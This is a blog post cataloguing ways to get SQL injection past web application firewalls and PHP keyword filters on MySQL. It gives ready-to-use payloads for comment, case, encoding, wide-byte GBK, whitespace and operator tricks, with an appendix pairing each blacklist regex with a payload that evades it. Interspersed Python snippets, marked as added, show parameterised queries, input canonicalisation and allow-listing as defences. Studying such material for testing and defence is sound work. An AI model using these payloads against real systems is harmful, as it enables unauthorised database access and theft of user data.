SQL injection bypass

Posted by shareaweb on Mon, 03 Jan 2022 10:43:40 +0100

1. Comment symbol bypass

--  comment content
# comment content
/* comment content */
;

2. Case bypass

Used when the WAF's regular expression is not case sensitive. In practice this mostly shows up in deliberately designed challenge problems.

UniOn
SeleCt

3. Inline comment bypass

An inline comment (/*! ... */) wraps statements that are specific to MySQL: other databases treat the contents as a comment and skip them, while MySQL executes them.

select * from cms_users where userid=1 union /*!select*/ 1,2,3;

4. Double write bypass

Some simple WAFs only strip the keyword select by replacing it with an empty string via replace(). Writing the keyword twice defeats this: select becomes selselectect, and once the WAF removes the inner select, the remaining text (sel + ect) is select again, which is exactly what the bypass needs.
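The following Python snippet is an added example, not code from the original post. It reproduces the single-pass replace() filter described above, shows that the double-write form survives it when the parameter is concatenated into the SQL text, and shows the parameterised query that treats the same input as plain data. The cms_users table, its rows and the input string are all constructed for the demo.

```python
import sqlite3

# Added example (not from the original post). Demonstrates why keyword removal is
# not a defence against SQL injection and how parameter binding closes the hole.

def naive_sanitize(value: str) -> str:
    """The weak WAF filter: remove every occurrence of the keyword 'select' once."""
    return value.replace("select", "")

def _demo_db() -> sqlite3.Connection:
    # Constructed sample table, assumed to mirror the post's cms_users.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_users (userid INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO cms_users VALUES (?, ?, ?)",
        [(1, "admin", "hash-of-admin-pw"), (2, "guest", "hash-of-guest-pw")],
    )
    return conn

def lookup_vulnerable(userid_param: str) -> list:
    """Filters the parameter, then still splices it into the SQL text."""
    conn = _demo_db()
    sql = ("SELECT userid, username, password FROM cms_users WHERE userid="
           + naive_sanitize(userid_param))
    return conn.execute(sql).fetchall()

def lookup_parameterised(userid_param: str) -> list:
    """Binds the parameter as a value: the database never parses it as SQL grammar."""
    conn = _demo_db()
    sql = "SELECT userid, username, password FROM cms_users WHERE userid=?"
    return conn.execute(sql, (userid_param,)).fetchall()

# Constructed input using the double-write form: removing the inner 'select'
# from 'selselectect' leaves 'sel' + 'ect' = 'select'.
DOUBLE_WRITE_INPUT = "1 union selselectect 1,2,3"

if __name__ == "__main__":
    print("filtered text :", naive_sanitize(DOUBLE_WRITE_INPUT))
    print("concatenated  :", lookup_vulnerable(DOUBLE_WRITE_INPUT))   # extra row (1, 2, 3)
    print("parameterised :", lookup_parameterised(DOUBLE_WRITE_INPUT))  # no rows
```

The concatenated query returns the injected row (1, 2, 3) alongside the real user, while the bound parameter is compared to userid as a value that matches nothing. Binding also keeps normal input working: lookup_parameterised("1") returns the admin row.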

5. Encoding bypass

For example, URL encoding, ASCII, hex and Unicode encoding bypasses.
Double URL-encoding of the keyword:

1+and+1=2
1+%25%36%31%25%36%65%25%36%34+1=2

ASCII encoding bypass:

Test is equivalent to CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)

Hex bypass:

select * from users where username = 'test1';
select * from users where username = 0x7465737431;

Bypassing some symbols with Unicode encoding:

Single quotation mark => %u0037 %u02b9
Space => %u0020 %uff00
Left parenthesis => %u0028 %uff08
Right parenthesis => %u0029 %uff09

6. Greater-than / less-than sign bypass

In blind SQL injection, comparisons are normally used to narrow down the ASCII value of a character and so enumerate it.
greatest(n1, n2, n3...) returns the largest of its arguments; least(n1, n2, n3...) returns the smallest.

select * from cms_users where userid=1 and greatest(ascii(substr(database(),1,1)),1)=99;

strcmp(str1, str2):
returns 0 if the two strings are the same, -1 if the first argument is smaller than the second according to the current collation, and 1 otherwise.

select * from cms_users where userid=1 and strcmp(ascii(substr(database(),1,1)),99);

The in keyword:

select * from cms_users where userid=1 and substr(database(),1,1) in ('c');

between a and b: the value lies between a and b (excluding b):

select * from cms_users where userid=1 and substr(database(),1,1) between 'a' and 'd';

7. Space bypass

Common substitutes for a filtered space:

/**/
()
newline (URL-encoded %0a)
` (the backtick, the key above Tab)
Tab
two spaces

8. Bypassing or, and, xor, not

or  = ||
and = &&
xor = | or ^   # e.g. select * from cms_users where userid=1^sleep(5);
not = !
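Sections 1 to 5 and 7 all defeat filters that match the raw parameter. The Python below is an added example, not code from the original post: a canonicalisation pass that a detection rule should run before matching, so that comment, case, URL/Unicode-encoding and whitespace variants collapse to one form. The SUSPECT pattern is an assumed, deliberately small rule used only to show the effect of canonicalising first; all inputs in the usage are constructed.

```python
import re
from urllib.parse import unquote, unquote_plus

# Added example (not from the original post): normalise a request parameter
# before any keyword matching, so the variants above no longer slip past.

_UNICODE_PCT = re.compile(r"%u([0-9a-fA-F]{4})")            # %uXXXX escapes
_INLINE_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)   # MySQL executes the body
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)              # /**/ behaves like a space
_LINE_COMMENT = re.compile(r"(--\s|#)[^\n]*")                # the tail of the line is hidden
_WHITESPACE = re.compile(r"[\s\x00]+")                       # tab, \n, \x0b, \x0c, two spaces ...

def url_decode_fully(value: str, max_rounds: int = 3) -> str:
    """Decode %XX, '+' and %uXXXX repeatedly until stable, so double encoding is undone."""
    decoded = unquote_plus(value)
    for _ in range(max_rounds):
        once = _UNICODE_PCT.sub(lambda m: chr(int(m.group(1), 16)), unquote(decoded))
        if once == decoded:
            break
        decoded = once
    return decoded

def canonicalize(value: str) -> str:
    """Return a lower-cased, comment-free, single-spaced form of the input."""
    text = url_decode_fully(value)
    text = _INLINE_COMMENT.sub(r" \1 ", text)   # keep the body of /*!...*/, MySQL runs it
    text = _BLOCK_COMMENT.sub(" ", text)
    text = _LINE_COMMENT.sub(" ", text)
    text = text.replace("`", " ")              # backtick used as a space substitute
    text = _WHITESPACE.sub(" ", text)
    return text.strip().lower()

# Assumed minimal rule, applied to the canonical form rather than the raw input.
SUSPECT = re.compile(r"\b(union\s+select|sleep\s*\(|benchmark\s*\()")

def looks_like_injection(value: str) -> bool:
    """True when the canonical form of the parameter contains one of the SUSPECT phrases."""
    return SUSPECT.search(canonicalize(value)) is not None

if __name__ == "__main__":
    # Constructed inputs mirroring the variants listed in the post.
    for sample in ["UniOn/**/SeleCt 1,2,3", "1 union /*!select*/ 1,2,3",
                   "1%20UnIoN%20%2573elect%201,2,3", "42"]:
        print(repr(sample), "->", repr(canonicalize(sample)), looks_like_injection(sample))
```

Canonicalising first is what makes a keyword rule meaningful for alerting; it still does not make string-built SQL safe, so it belongs in the detection layer next to, not instead of, parameterised queries in the application.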

9. Equals sign bypass

like without a wildcard behaves the same as =, so it can replace it.
like with a wildcard, as normally used:

select * from cms_users where username like "ad%";

like without a wildcard in place of =:

select * from cms_users where username like "admin";

REGEXP: the REGEXP operator performs regular-expression matching in MySQL:

select * from cms_users where username REGEXP "admin";

Using the greater-than and less-than signs:

select * from cms_users where userid>0 and userid<2;

<> is equivalent to !=, so putting a ! in front of it produces an equality test:

select * from cms_users where !(username <> "admin");

10. Bypassing single quotation marks

Using hex
Quotes usually appear in the final where clause. For example, the following statement lists all columns of the users table:

select column_name from information_schema.columns where table_name="users"

If quotation marks are filtered, that where clause can no longer be written as-is, and hexadecimal is the usual way round it.
The hexadecimal form of the string users is 7573657273, so the statement becomes:

select column_name from information_schema.columns where table_name=0x7573657273

Wide byte
When MySQL runs with the GBK character set, it treats two bytes as one Chinese character. There are generally two ideas:

(1) Let %df swallow the \. The specific method: the escaped quote \' URL-encodes to %5c%27. Put %df in front of %5c%27 to form %df%5c%27. In GBK mode MySQL treats the two bytes %df%5c as one Chinese character, which leaves %27 outside as a bare ' :

id=-1%df%27union select 1,user(),3--+

(2) Neutralise the \ in \'. For example, construct %**%5c%5c%27: the later %5c is escaped by the %5c before it.

PHP functions that commonly give rise to wide-byte injection:
1. replace(): filters ' and \ by turning ' into \', \ into \\, and " into \". Use idea (1).

2. addslashes(): returns a string with a backslash (\) added before the predefined characters ', " and \. Use idea (1).

(To prevent this vulnerability, set the character set used by mysql_query to binary.)
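The Python below is an added example, not code from the original post. It imitates addslashes() at byte level and then decodes the escaped bytes the way a GBK and a UTF-8 connection would, so the disappearing backslash of idea (1) can be observed directly. The probe byte string is constructed for the demo.

```python
# Added example (not from the original post): why the backslash that addslashes()
# inserts can vanish under GBK and survives under UTF-8.

def addslashes(raw: bytes) -> bytes:
    """Byte-level imitation of PHP's addslashes(): backslash before ' \" \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)   # the escaping backslash
        out.append(b)
    return bytes(out)

def escaped_quote_survives(raw: bytes, charset: str) -> bool:
    """Escape the bytes, decode them as the database would, and report whether
    every single quote is still immediately preceded by a backslash."""
    text = addslashes(raw).decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return False
    return True

def merged_length(raw: bytes, charset: str) -> int:
    """How many characters the escaped bytes decode to under the given charset."""
    return len(addslashes(raw).decode(charset, errors="replace"))

# Constructed probe: the lead byte 0xDF followed by a single quote (URL form %df%27).
PROBE = b"\xdf'"

def demo() -> dict:
    return {
        "gbk": escaped_quote_survives(PROBE, "gbk"),        # 0xDF 0x5C becomes one character
        "utf-8": escaped_quote_survives(PROBE, "utf-8"),    # 0xDF is invalid alone, 0x5C stays
        "plain_ascii": escaped_quote_survives(b"O'Brien", "gbk"),
    }

if __name__ == "__main__":
    for charset, ok in demo().items():
        print(f"{charset:12s} escaped quote intact: {ok}")
```

Under GBK the three escaped bytes decode to two characters, the backslash having been absorbed into the first, so the quote stands unescaped; under UTF-8 the stray lead byte is replaced and the backslash is kept. The practical fix is to keep the client library and the server agreed on one charset (in PHP via mysqli_set_charset() rather than a bare SET NAMES query) and to bind parameters instead of escaping them.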

11. Bypassing commas

The following functions are commonly used in blind SQL injection:

substr()
substr(string, pos, len): starting at pos, take a substring of length len
substr(string, pos): starting at pos, take everything up to the end of string

substring()
same usage as substr()

mid()
same usage as substr(); mid() only exists for backward compatibility with VB6.0 and is outdated. pos in all of the functions above starts from 1

left() and right()
left(string, len) and right(string, len): take a substring of length len from the left or the right, respectively

limit
limit pos, len: of the result rows, return len rows starting at pos, where pos is counted from 0

ascii() and char()
ascii(char): convert a character to its ASCII code
char(ascii_int): the reverse of ascii(); convert an ASCII code to a character

substr() and mid() can be rewritten with the from ... for form:
 select substr(database() from 1 for 1)='c';
Use the join keyword instead of commas:
 union select 1,2,3,4;
 union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
 union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
Use like in place of substring functions such as substr():
 select ascii(mid(user(),1,1))=80   # equivalent to
 select user() like 'r%'
Use the offset keyword:
 select * from cms_users limit 0,1;
 # equivalent to the following statement
 select * from cms_users limit 1 offset 0;

12. Filtered function bypass

sleep() --> benchmark()
select 12,23 and sleep(1);
benchmark() takes the number of executions and the expression to execute: the first parameter is the repeat count, the second is the expression
select 12,23 and benchmark(10000000,1);

ascii() --> hex(), bin()
After substituting, convert the corresponding hex value back to a string
group_concat() --> concat_ws()
select group_concat("str1","str2");
select concat_ws(",","str1","str2");

substr(), substring() and mid() can replace each other; left() and right() are substring functions as well
user() --> @@user, datadir --> @@datadir
ord() --> ascii(): the two functions behave the same for English characters but differ for Chinese and other multibyte text

Filtered if function:
if, the judgement statement itself:
select if(substr(database(),1,1)='c',1,0);
ifnull function:
select ifnull(substr(database(),1,1)='c',0);
case when then:
select case substr(database(),1,1)='c' when 1 then 1 else 0 end;

Appendix: some common filtering methods in PHP and their bypasses

Filtered keywords: and, or
PHP code: preg_match('/(and|or)/i', $id)
Blocked payload: 1 or 1=1    1 and 1=1
Bypass: 1 || 1=1    1 && 1=1

Filtered keywords: and, or, union
PHP code: preg_match('/(and|or|union)/i', $id)
Blocked payload: union select user,password from users
Bypass: 1 && (select user from users where userid=1)='admin'

Filtered keywords: and, or, union, where
PHP code: preg_match('/(and|or|union|where)/i', $id)
Blocked payload: 1 && (select user from users where user_id = 1) = 'admin'
Bypass: 1 && (select user from users limit 1) = 'admin'


Filtered keywords: and, or, union, where, limit
PHP code: preg_match('/(and|or|union|where|limit)/i', $id)
Blocked payload: 1 && (select user from users limit 1) = 'admin'
Bypass: 1 && (select user from users group by user_id having user_id = 1) = 'admin'   # grouping by user_id, the user whose user_id is 1 is admin

Filtered keywords: and, or, union, where, limit, group by
PHP code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Blocked payload: 1 && (select user from users group by user_id having user_id = 1) = 'admin'
Bypass: 1 && (select substr(group_concat(user_id),1,1) user from users) = 1

Filtered keywords: and, or, union, where, limit, group by, select
PHP code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Blocked payload: 1 && (select substr(group_concat(user_id),1,1) user from users) = 1
Bypass: 1 && substr(user,1,1) = 'a'

Filtered keywords: and, or, union, where, limit, group by, select, '
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Blocked payload: 1 && (select substr(group_concat(user_id),1,1) user from users) = 1
Bypass: 1 && user_id is not null    1 && substr(user,1,1) = 0x61    1 && substr(user,1,1) = unhex(61)

Filtered keywords: and, or, union, where, limit, group by, select, ', hex
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Blocked payload: 1 && substr(user,1,1) = unhex(61)
Bypass: 1 && substr(user,1,1) = lower(conv(11,10,16))   # decimal 11 converted to hexadecimal, then lower-cased

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Blocked payload: 1 && substr(user,1,1) = lower(conv(11,10,16))
Bypass: 1 && lpad(user,7,1)

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, space
PHP code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Blocked payload: 1 && lpad(user,7,1)
Bypass: 1%0b||%0blpad(user,7,1)

Filtered keywords: and, or, union, where
PHP code: preg_match('/(and|or|union|where)/i', $id)
Blocked payload: 1 || (select user from users where user_id = 1) = 'admin'
Bypass: 1 || (select user from users limit 1) = 'admin'
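The appendix shows a blacklist being extended row by row and a payload being reshaped to slip past each version. The Python below is an added example, not code from the original post: it rebuilds three of the appendix's regexes with Python's re module and puts them next to the allow-list check that actually fits a numeric $id parameter. The ID_PATTERN and the sample inputs are assumptions made for the demo, and the appendix's own bypass strings are used as inputs.

```python
import re

# Added example (not from the original post): the appendix's keyword blacklists
# versus an allow-list for a numeric id parameter.

# Three of the appendix's filters, loosest to strictest (PHP /i == re.I).
BLACKLISTS = [
    re.compile(r"(and|or)", re.I),
    re.compile(r"(and|or|union|where)", re.I),
    re.compile(r"(and|or|union|where|limit|group by|select|'|hex|substr|\s)", re.I),
]

def blacklist_blocks(value: str, level: int = 0) -> bool:
    """True when the keyword filter at `level` would reject the input."""
    return BLACKLISTS[level].search(value) is not None

# Assumed allow-list for an id parameter: a positive integer of at most ten digits.
ID_PATTERN = re.compile(r"[1-9][0-9]{0,9}")

def allowlist_id(value: str) -> bool:
    """True only when the whole input is a plain positive integer."""
    return ID_PATTERN.fullmatch(value) is not None

def compare(value: str, level: int = 0) -> dict:
    """Side-by-side verdict of the two strategies for one input."""
    return {"blacklist_blocks": blacklist_blocks(value, level),
            "allowlist_accepts": allowlist_id(value)}

if __name__ == "__main__":
    # Constructed inputs: a normal id, the appendix's first bypass, and free text
    # that merely contains the letters "or" and "and".
    for sample in ["42", "1 || 1=1", "1 or 1=1", "Oregon", "Andrew"]:
        print(f"{sample!r:12} {compare(sample)}")
```

The blacklist misses the appendix's own bypass strings while rejecting harmless text such as "Oregon" or "Andrew" that happens to contain a listed word. Validating the shape the parameter must have, and binding it in the query, avoids both failure modes at once.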